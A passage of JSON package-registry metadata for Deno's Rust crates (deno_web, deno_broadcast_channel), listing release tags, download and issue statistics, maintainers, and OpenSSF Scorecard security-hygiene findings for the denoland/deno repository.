denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-31T15:19:49.848Z","dependent_packages_count":24,"downloads":1621472,"downloads_period":"total","dependent_repos_count":199,"rankings":{"downloads":3.812250550442299,"dependent_repos_count":2.768938716127376,"dependent_packages_count":1.7310729540273704,"stargazers_count":0.002334030949250387,"forks_count":0.05912878404767647,"docker_downloads_count":3.08896531333157,"average":1.9104483914875905},"purl":"pkg:cargo/deno_web","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_web","docker_dependents_count":30,"docker_downloads_count":23282372,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_web","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_web/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-31T04:05:42.345Z","issues_count":6636,"pull_requests_count":9651,"avg_time_to_close_issue":17191240.372105263,"avg_time_to_close_pull_request":1531932.6714801444,"issues_closed_count":3798,"pull_requests_closed_count":8032,"pull_request_authors_count":583,"issue_authors_count":2480,"avg_comments_per_issue":2.5051235684147075,"avg_comments_per_pull_request":0.7197181639208372,"merged_pull_requests_count":7013,"bot_issues_count":0,"bot_pull_requests_count":48,"past_year_issues_count":671,"past_year_pull_requests_count":1202,"past_year_avg_time_to_close_issue":1410952.7079646017,"past_year_avg_time_to_close_pull_request":1322346.2602118002,"past_year_issues_closed_count":226,"past_year_pull_requests_closed_count":661,"past_year_pull_request_authors_count":186,"past_year_issue_authors_count":373,"past_year_avg_comments_per_issue":1.232488822652757,"past_year_avg_comments_per_pull_request":1.1123128119800334,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":13,"past_year_merged_pull_requests_count":488,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1799,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":674,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":290,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":284,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":21,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"leandrohstein","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/leandrohstein"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":395,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":186,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"crowlKats","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"dsherret","count":28,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"devsnek","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"ry","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_web/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2022-11-07T18:29:36.998Z","updated_at":"2022-11-07T18:29:36.998Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2023-07-18T22:41:29.270Z","updated_at":"2023-07-18T22:41:29.270Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":338199,"maintainers_count":71476,"namespaces_count":0,"keywords_count":71845,"github":"rust-lang","metadata":{"funded_packages_count":30558,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-04T05:05:22.166Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":4047014,"name":"deno_broadcast_channel","ecosystem":"cargo","description":"DEPRECATED: use `deno_web` instead","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":216,"first_release_published_at":"2021-05-23T13:44:47.535Z","latest_release_published_at":"2025-11-06T07:37:10.916Z","latest_release_number":"0.216.0","last_synced_at":"2026-09-07T23:00:55.347Z","created_at":"2022-04-12T09:57:59.272Z","updated_at":"2026-09-07T23:00:55.348Z","registry_url":"https://crates.io/crates/deno_broadcast_channel/","install_command":"cargo install deno_broadcast_channel","documentation_url":"https://docs.rs/deno_broadcast_channel/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to 